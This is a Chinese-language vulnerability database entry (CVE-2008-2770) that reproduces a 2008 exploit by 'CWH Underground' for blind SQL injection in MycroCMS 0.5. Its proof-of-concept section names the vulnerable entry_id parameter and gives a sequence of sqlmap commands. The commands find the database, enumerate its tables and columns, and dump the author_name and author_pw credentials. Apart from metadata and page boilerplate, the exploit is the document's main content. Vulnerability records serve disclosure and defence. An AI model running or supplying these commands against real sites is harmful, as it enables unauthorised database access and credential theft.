MycroCMS 0.5 - Remote Blind SQL Injection Vulnerability

基本字段

漏洞编号：: SSV-65480

披露/发现时间：: 2008-06-18

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2008-2770

CNNVD-ID：: CNNVD-200806-270

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.25KB

======================================================= MycroCMS 0.5 Remote Blind SQL Injection Vulnerability ======================================================= ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 11 June 2008 SITE : www.citec.us ##################################################### APPLICATION : MycroCMS VERSION : 0.5 (Lastest Version) DOWNLOAD : http://downloads.sourceforge.net/mycrocms ##################################################### ---Remote Blind SQL Injection--- ***magic_quotes_gpc = off*** ----------------- Vulnerable Path ----------------- [+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL] --------------------------------- Blind SQL Injection with SqlMap --------------------------------- [+] Find DB name POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" --current-db -u http://localhost/mycrocms/?entry_id=3 [+] Enumerate All Tables (Use Database "mycrocms") POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" --tables -u http://localhost/mycrocms/?entry_id=3 [+] Enumerate All Columns in Table (Use Table "mbauthor") POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" --columns -u http://localhost/mycrocms/?entry_id=3 [+] Dump All Data in Column (Use Column "author_name" and "author_pw") POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3 ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-06-11]

共 3 兑换

参考链接

http://www.exploit-db.com/exploits/5787

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

2008-06-18 发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

MycroCMS 0.5 - Remote Blind SQL Injection Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

MycroCMS 0.5 - Remote Blind SQL Injection Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定